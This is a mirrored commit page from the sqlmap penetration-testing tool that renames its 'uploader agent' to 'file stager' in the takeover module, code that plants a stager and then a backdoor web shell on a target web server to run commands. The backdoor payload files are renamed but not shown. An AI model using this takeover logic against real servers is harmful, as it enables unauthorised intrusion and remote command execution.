sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 13:14:13 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor refactoring

Browse Source
This commit is contained in:
Bernardo Damele 2010-10-17 21:06:52 +00:00
parent 60a1b48194
commit 683184cc8f
5 changed files with 21 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
lib/takeover/web.py
View File

@ -44,7 +44,7 @@ class Web:
self.webApi = None self.webApi = None
self.webBaseUrl = None self.webBaseUrl = None
self.webBackdoorUrl = None self.webBackdoorUrl = None
self.webUploaderUrl = None self.webStagerUrl = None
self.webDirectory = None self.webDirectory = None
def webBackdoorRunCmd(self, cmd): def webBackdoorRunCmd(self, cmd):
@ -84,11 +84,11 @@ class Web:
"uploadDir": directory, "uploadDir": directory,
} }
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False) page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page: if "File uploaded" not in page:
warnMsg = "unable to upload the backdoor through " warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory warnMsg += "the file stager on '%s'" % directory
logger.warn(warnMsg) logger.warn(warnMsg)
return False return False
else: else:
@ -114,12 +114,12 @@ class Web:
remote directory within the web server document root. remote directory within the web server document root.
""" """
if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None: if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
return return
self.checkDbmsOs() self.checkDbmsOs()
infoMsg = "trying to upload the uploader agent" infoMsg = "trying to upload the file stager"
logger.info(infoMsg) logger.info(infoMsg)
message = "which web application language does the web server " message = "which web application language does the web server "
@ -159,12 +159,12 @@ class Web:
backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
originalBackdoorContent = backdoorContent = backdoorStream.read() originalBackdoorContent = backdoorContent = backdoorStream.read()
uploaderName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi)) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
for directory in directories: for directory in directories:
# Upload the uploader agent # Upload the file stager
self.__webFileInject(uploaderContent, uploaderName, directory) self.__webFileInject(stagerContent, stagerName, directory)
requestDir = ntToPosixSlashes(directory) requestDir = ntToPosixSlashes(directory)
if requestDir[-1] != '/': if requestDir[-1] != '/':
@ -181,19 +181,19 @@ class Web:
requestDir = '/' + requestDir requestDir = '/' + requestDir
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName) self.webStagerUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), stagerName)
self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/")) self.webStagerUrl = ntToPosixSlashes(self.webStagerUrl.replace("./", "/"))
uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
if "sqlmap file uploader" not in uplPage: if "sqlmap file uploader" not in uplPage:
warnMsg = "unable to upload the uploader " warnMsg = "unable to upload the file stager "
warnMsg += "agent on '%s'" % directory warnMsg += "on '%s'" % directory
logger.warn(warnMsg) logger.warn(warnMsg)
continue continue
infoMsg = "the uploader agent has been successfully uploaded " infoMsg = "the file stager has been successfully uploaded "
infoMsg += "on '%s' ('%s')" % (directory, self.webUploaderUrl) infoMsg += "on '%s' ('%s')" % (directory, self.webStagerUrl)
logger.info(infoMsg) logger.info(infoMsg)
if self.webApi == "asp": if self.webApi == "asp":
@ -221,13 +221,13 @@ class Web:
else: else:
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory): if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg = "backdoor hasn't been successfully uploaded " warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "with uploader probably because of permission " warnMsg += "with file stager probably because of "
warnMsg += "issues." warnMsg += "lack of write permission."
logger.warn(warnMsg) logger.warn(warnMsg)
message = "do you want to try the same method used " message = "do you want to try the same method used "
message += "for uploader? [y/N] " message += "for the file stager? [y/N] "
getOutput = readInput(message, default="N") getOutput = readInput(message, default="N")
if getOutput in ("y", "Y"): if getOutput in ("y", "Y"):

0
shell/uploader.asp_ → shell/stager.asp_
View File

0
shell/uploader.aspx.vb_ → shell/stager.aspx.vb_
View File

0
shell/uploader.aspx_ → shell/stager.aspx_
View File

0
shell/uploader.php_ → shell/stager.php_
View File